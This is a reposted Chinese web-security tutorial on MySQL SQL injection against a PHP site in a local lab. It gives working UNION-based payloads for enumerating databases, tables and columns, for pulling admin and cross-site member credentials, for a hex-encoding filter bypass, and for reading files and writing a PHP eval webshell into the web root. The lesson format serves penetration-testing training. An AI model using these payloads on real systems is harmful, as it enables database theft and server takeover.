042-WEB攻防-PHP应用MYSQL架构SQL注入跨库查询文件读写权限操作

本文主要是介绍042-WEB攻防-PHP应用MYSQL架构SQL注入跨库查询文件读写权限操作,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

042-WEB攻防-PHP应用&MYSQL架构&SQL注入&跨库查询&文件读写&权限操作

#知识点:

1、PHP-MYSQL-SQL注入-常规查询
2、PHP-MYSQL-SQL注入-跨库查询
3、PHP-MYSQL-SQL注入-文件读写

演示案例:

➢PHP-MYSQL-Web组成架构
➢PHP-MYSQL-SQL常规查询
➢PHP-MYSQL-SQL跨库查询
➢PHP-MYSQL-SQL文件读写

MYSQL注入:(目的获取当前web权限)
1、判断常见四个信息(系统,用户,数据库名,版本)
2、根据四个信息去选择方案

  • root用户:先测试读写,后测试获取数据
  • 非root用户:直接测试获取数据

#PHP-MYSQL-Web组成架构

服务器安装MYSQL数据库,搭建多个站点,数据库集中存储MYSQL数据库中管理
可以都使用root用户管理也可以创建多个用户进行每个网站对应的数据库管理

Untitled

1、统一交root用户管理

  • www.zblog.com = zblog = root =>MYSQL
    www.demo01.com = demo01 = root =>MYSQL

Untitled

2、一对一用户管理(推荐)

自己的网站单独创建数据库用户去管理自己的数据库

  • www.zblog.com = zblog = zblog =>MYSQL
    www.demo01.com = demo01 = demo01 =>MYSQL

Untitled

#PHP-MYSQL-SQL常规查询

Untitled

1.SQL注人的概念

原理:接受的参数值未进行过滤直接带入SQL查询的操作
攻击:利用SQL语句执行你想要的东西(SQL语句能干嘛,注人就能干嘛)
SQL语句能干嘛⇒SQL语句由谁决定⇒数据库类型决定〈为什么mysql注入。oracle注人叫法原因)

Untitled

3.相关解释

Untitled

获取相关数据:
1、数据库版本-看是否符合information_schema查询-version()
2、数据库用户-看**是否符合ROOT型注入攻击-user()**
3、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os
4、数据库名字-为后期猜解指定数据库下的表,列做准备-database()

MYSQL5.0以上版本:自带的数据库名information_schema

  1. information_schema存储数据库下的数据库名及表名,列名信息的数据库
  2. information_schema.schemata记录数据库名信息的表
  3. information_schema.tables记录表名信息的表
  4. information_schema.columns记录列名信息表
  5. schema_name:information_schema.schemata记录**数据库名信息的列名值**
  6. table_schema:information_schema.tables记录**数据库名的列名值**
  7. table_name:information_schema.tables记录**表名的列名值**
  8. column_name:information_schema.columns**记录列名的列名值**

2.SQL注人的流程:获取数据→一步一步得到信息

  1. order by 6:这是一个排序语句,指示按照第6列进行排序

    1. 实战中,需要进行判断注入的列名有几个。

    2. 有的话页面正常执行

    3. 没有即会报错

    4. 如:该表存在6列,输入7后会报错

      Untitled

      Untitled

  2. union select 1,2,3,4,5,6:这是一个UNION查询,用于将多个SELECT语句的结果合并在一起。在这个例子中,它选择了6个列,每个SELECT语句都返回常量值。

    1. 发现执行后回显的数据:分别出现在网页署名(2),正标题(4),副标题(4),次标题(5)
    2. 如果没有回显数据,则在查询id加入负号即可http://192.168.137.1:84/new.php?id=-1 union select 1,2,3,4,5,6
    3. 查找回显的作用:可以判断后期注入查询返回的数据,可以在页面中显示出来;

    Untitled

  3. union select 1,2,3,database(),user(),6:这个UNION查询选择了6个列,并在第4列返回数据库名称第5列返回当前用户,其他列返回常量值。

    Untitled

  4. union select 1,2,3,version(),@@version_compile_os,6:这个UNION查询选择了6个列,并在第4列返回数据库版本第5列返回操作系统信息,其他列返回常量值。

    1. 返回数据库版本原因:MYSQL5.0以上版本:自带的数据库名information_schema(只有5.0以上的版本才可以实行下一步查询
    2. 返回操作系统信息原因:如果是Linux系统对于后面的查询信息,大小写特定敏感

    Untitled

  5. union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema='demo01':这个UNION查询选择了6个列,并从information_schema.tables表中返回指定数据库(demo01)中的所有表名的组合字符串。

    Untitled

    1. information_schema.tables表记录表名信息的表
    2. table_schema:information_schema.tables记录**数据库名的列名值**
    3. table_name:information_schema.tables记录**表名的列名值**

    Untitled

    Untitled

    Untitled

  6. union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name='admin':这个UNION查询选择了6个列,并从information_schema.columns表中返回指定表(admin)中的所有列名的组合字符串。

    Untitled

    1. information_schema.columns 记录列名信息表

    2. table_name:information_schema.tables记录**表名的列名值**

    3. column_name:information_schema.columns**记录列名的列名值**

      Untitled

    Untitled

    Untitled

  7. union select 1,2,3,username,password,6 from admin limit 0,1:这个UNION查询选择了6个列,并从admin表中返回第一行记录的用户名和密码。

    Untitled

Untitled

#PHP-MYSQL-SQL跨库查询

1.SQL跨库查询:通过B网站的注入点获取A网站的账号和密码

Untitled

2.影响条件:当前数据库ROOT用户权限

Untitled

3.跨库查询顺序

测试不同数据库用户:root demo

  1. union select 1,2,3,4,group_concat(schema_name),6 from information_schema.schemata: 通过 information_schema.schemata获取所有数据库的名称,并将这些名称连接成一个字符串。

    Untitled

  2. union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema='zblog': 通过 information_schema.tables 表获取 ‘zblog’ 数据库中所有表的名称,并将这些名称连接成一个字符串。

    Untitled

  3. union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name='zbp_member' and table_schema='zblog': 通过 information_schema.columns获取 ‘zblog’ 数据库中 ‘zbp_member’ 表的所有列名,并将这些列名连接成一个字符串。

    Untitled

  4. union select 1,2,3,mem_Name,mem_Password,6 from **zblog.zbp_member**: 尝试从 ‘zblog’ 数据库的 ‘zbp_member’ 表中选择 mem_Namemem_Password 列的数据,限制结果集为一个行。

    Untitled

4.注意事项

  • 注意:由于是跨库操作,在此刻必须指明是哪个数据库的表名

    1. from **zblog.zbp_member**:
    2. 不然会进行报错
    3. 表示 mysqli_query 返回的结果不是有效的 mysqli_result 对象,而是布尔值 false,可能是由于 SQL 查询执行失败。

    Untitled

  • 必须数据库权限是ROOT用户权限→才可以进行跨库

    • 如下文件数据库配置则代表是最高权限ROOT用户权限

    Untitled

    • 如果是其他数据库的权限
      • 只能看到该数据库用户下管理的表
    • 无法执行跨库

    Untitled

    Untitled

Untitled

Untitled

  • 解决:单引号过滤绕过方式

    • SQL注入语句使用单引号就不要编码,编码就不用单引号(路径,表名,数据库名等)注意:在编码后执行SQL注入时候要在编码前加0x

    • 当在编码后执行SQL注入时,如果要将编码后的Payload作为十六进制值直接传递给SQL语句,需要在编码前添加0x前缀。这是因为在许多DBMS中,0x前缀用于指示后续的字符串是十六进制值。

    • Hex编码(十六进制编码)是一种将数据转换为十六进制数字表示的编码方式。这种编码方式广泛用于表示二进制数据,例如在网络通信、编码传输、调试和数据存储中。

      Untitled

    Untitled

#PHP-MYSQL-SQL文件读写

1.影响条件:(必要条件)

  1. 当前数据库用户权限→必须是root用户

    Untitled

  2. secure-file-priv设置→默认关闭,必须添加到MYsql的配置文件my.ini中

  • G:\develop\safety\phpstudy_pro\Extensions\MySQL5.7.26*my.ini*

    Untitled

    • secure_file_priv 是 MySQL 数据库中的一个系统变量,用于限制使用 LOAD DATA INFILESELECT ... INTO OUTFILE 语句时可以读取和写入的文件的路径。这个变量通常用于提高数据库的安全性,防止用户滥用这些语句导致的文件系统访问。

      • 如果设置了这个变量,MySQL 将仅允许在指定的路径下进行文件的读取和写入操作。
      • 如果没有设置,MySQL 将默认使用空值,表示禁用 LOAD DATA INFILESELECT ... INTO OUTFILE
    • 例如,如果 secure_file_priv 被设置为 f:\\,那么在执行 LOAD DATA INFILESELECT ... INTO OUTFILE 时,只允许读写位于 f:\\ 目录下的文件。

      Untitled

      Untitled

      Untitled

2.进行测试

测试不同数据库用户:root demo

  1. union select 1,load_file(‘d:\1.txt’),3,4,5,6这个部分尝试使用 MySQL 的 load_file 函数加载本地文件 ‘d:\1.txt’ 的内容,并将其作为查询结果的一部分返回。

    Untitled

  2. union select 1,‘xiaodi’,3,4,5,6 into outfile ‘d:\2.txt’

    • 将查询结果写入一个文件 ‘d:\2.txt’。

      • 这个查询也是一种尝试,试图将查询结果写入到指定的文件中。
      • 成功写入

      Untitled

      Untitled

  3. union select 1,2,3,'<?php eval($_POST[x]);?>',5,6 into outfile **'G:\\develop\\safety\\phpstudy_pro\\WWW\\dome01\\xiaodi.php’** 将木马文件写入网站源码目录,方便获取权限

    • **<?php eval($_POST[x]);?>**这是一个PHP代码片段,它使用eval()函数执行传递给$_POST[x]的代码。这段代码的含义是,它将执行$_POST[x]参数中包含的任意代码。
    • into outfile 'G:\\develop\\safety\\phpstudy_pro\\WWW\\dome01\\xiaodi.php': 这是将木马文件写入网站源码目录,指定了写入的路径和文件名。

Untitled

3.读写的路径的问题:

1、报错显示获取路径

Untitled

2、phpinfo页面泄漏

Untitled

Untitled

如果不知道路径思路:
用常见的默认的中间件,数据库等安装路径读取有价值信息

load_file()常用路径:load_file()常用路径_load file 目录-CSDN博客

Untitled

这篇关于042-WEB攻防-PHP应用MYSQL架构SQL注入跨库查询文件读写权限操作的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/735361

相关文章

Python位移操作和位运算的实现示例

《Python位移操作和位运算的实现示例》本文主要介绍了Python位移操作和位运算的实现示例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一... 目录1. 位移操作1.1 左移操作 (<<)1.2 右移操作 (>>)注意事项:2. 位运算2.1

MySQL 中的 JSON 查询案例详解

《MySQL中的JSON查询案例详解》:本文主要介绍MySQL的JSON查询的相关知识,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下吧... 目录mysql 的 jsON 路径格式基本结构路径组件详解特殊语法元素实际示例简单路径复杂路径简写操作符注意MySQL 的 J

C语言中位操作的实际应用举例

《C语言中位操作的实际应用举例》:本文主要介绍C语言中位操作的实际应用,总结了位操作的使用场景,并指出了需要注意的问题,如可读性、平台依赖性和溢出风险,文中通过代码介绍的非常详细,需要的朋友可以参... 目录1. 嵌入式系统与硬件寄存器操作2. 网络协议解析3. 图像处理与颜色编码4. 高效处理布尔标志集合

Go语言开发实现查询IP信息的MCP服务器

《Go语言开发实现查询IP信息的MCP服务器》随着MCP的快速普及和广泛应用,MCP服务器也层出不穷,本文将详细介绍如何在Go语言中使用go-mcp库来开发一个查询IP信息的MCP... 目录前言mcp-ip-geo 服务器目录结构说明查询 IP 信息功能实现工具实现工具管理查询单个 IP 信息工具的实现服

Python ZIP文件操作技巧详解

《PythonZIP文件操作技巧详解》在数据处理和系统开发中,ZIP文件操作是开发者必须掌握的核心技能,Python标准库提供的zipfile模块以简洁的API和跨平台特性,成为处理ZIP文件的首选... 目录一、ZIP文件操作基础三板斧1.1 创建压缩包1.2 解压操作1.3 文件遍历与信息获取二、进阶技

Windows 上如果忘记了 MySQL 密码 重置密码的两种方法

《Windows上如果忘记了MySQL密码重置密码的两种方法》:本文主要介绍Windows上如果忘记了MySQL密码重置密码的两种方法,本文通过两种方法结合实例代码给大家介绍的非常详细,感... 目录方法 1:以跳过权限验证模式启动 mysql 并重置密码方法 2:使用 my.ini 文件的临时配置在 Wi

Java中字符串转时间与时间转字符串的操作详解

《Java中字符串转时间与时间转字符串的操作详解》Java的java.time包提供了强大的日期和时间处理功能,通过DateTimeFormatter可以轻松地在日期时间对象和字符串之间进行转换,下面... 目录一、字符串转时间(一)使用预定义格式(二)自定义格式二、时间转字符串(一)使用预定义格式(二)自

MySQL重复数据处理的七种高效方法

《MySQL重复数据处理的七种高效方法》你是不是也曾遇到过这样的烦恼:明明系统测试时一切正常,上线后却频频出现重复数据,大批量导数据时,总有那么几条不听话的记录导致整个事务莫名回滚,今天,我就跟大家分... 目录1. 重复数据插入问题分析1.1 问题本质1.2 常见场景图2. 基础解决方案:使用异常捕获3.

SQL中redo log 刷⼊磁盘的常见方法

《SQL中redolog刷⼊磁盘的常见方法》本文主要介绍了SQL中redolog刷⼊磁盘的常见方法,将redolog刷入磁盘的方法确保了数据的持久性和一致性,下面就来具体介绍一下,感兴趣的可以了解... 目录Redo Log 刷入磁盘的方法Redo Log 刷入磁盘的过程代码示例(伪代码)在数据库系统中,r

mysql中的group by高级用法

《mysql中的groupby高级用法》MySQL中的GROUPBY是数据聚合分析的核心功能,主要用于将结果集按指定列分组,并结合聚合函数进行统计计算,下面给大家介绍mysql中的groupby用法... 目录一、基本语法与核心功能二、基础用法示例1. 单列分组统计2. 多列组合分组3. 与WHERE结合使